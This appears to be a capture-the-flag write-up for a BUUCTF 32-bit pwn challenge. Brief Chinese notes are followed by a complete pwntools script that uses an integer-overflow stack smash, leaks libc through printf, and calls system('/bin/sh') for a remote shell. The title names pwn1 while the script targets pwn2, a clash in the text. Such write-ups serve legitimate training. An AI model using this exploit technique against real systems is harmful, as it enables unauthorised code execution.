Buuctf pwn1_sctf_2016
checksec
run
ida
在程序中搜索，既没有 system 也没有 /bin/sh，所以明显需要用 ROP 构造利用链。
nptr 处可以利用整数溢出来构造 ROP。
然后可以利用 printf 函数泄露 libc 地址，从而确定程序使用的 libc 版本。
最后覆盖返回地址调用 system 来 getshell。
exp
from pwn import *
from LibcSearcher import *
# Exploit script for the BUUCTF "pwn2" binary described in the notes above.
# Why it works, and what would stop it (educational summary):
#   * The binary asks how many bytes to read; the reply "-1" is accepted and,
#     per the notes, the integer handling at nptr lets the following read
#     overrun a stack buffer.  Validating the count as an unsigned value
#     against the real buffer size would close this.
#   * The return address is overwritten at a fixed offset and PLT/GOT/main
#     addresses are taken straight from the ELF, which presumes a non-PIE
#     binary with no stack canary; either mitigation breaks a step below.
#   * A readable printf GOT entry yields one libc pointer; LibcSearcher maps
#     it to a libc build to locate system and the "/bin/sh" string.
context(os = 'linux', arch = 'i386', log_level = 'debug')
elf = ELF("./pwn2")

# 1 = run ./pwn2 locally, 0 = connect to the BUUCTF instance.
local = 0
r = process("./pwn2") if local else remote("node4.buuoj.cn",25331)

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']

# Padding from the start of the overflowed buffer up to the saved return
# address (presumably 0x2C of buffer/locals plus the 4-byte saved frame
# pointer -- confirm against the stack layout in IDA).
RET_OFFSET = 0x2C + 0x4


def overflow_round(chain: bytes) -> None:
    """Drive one prompt cycle: claim -1 bytes, then send padding + *chain*.

    Args:
        chain: the bytes placed over the saved return address and beyond.
    """
    r.recvuntil("How many bytes do you want me to read?")
    r.sendline("-1")
    r.recvuntil("data!\n")
    r.sendline(b'a' * RET_OFFSET + chain)


# Round 1: return into printf@plt with main as printf's own return address
# and printf's GOT slot as its argument, so the program prints the resolved
# libc printf pointer and then re-enters main for a second prompt.
overflow_round(p32(printf_plt) + p32(main_addr) + p32(printf_got))
r.recvuntil("\n")  # skip the line printed before the chain runs (presumably the input echo -- confirm)
printf_addr = u32(r.recv(4))
log.success("the printf_addr is " + hex(printf_addr))

# Resolve the remote libc from the single leaked pointer.  The dump() calls
# are kept in the original order.
libc = LibcSearcher('printf',printf_addr)
off = {sym: libc.dump(sym) for sym in ('printf', 'system', 'str_bin_sh')}
libc_base = printf_addr - off['printf']
system_addr = libc_base + off['system']
str_bin_sh_addr = libc_base + off['str_bin_sh']

# Round 2: return into system("/bin/sh"), again falling back into main.
overflow_round(p32(system_addr) + p32(main_addr) + p32(str_bin_sh_addr))
r.interactive()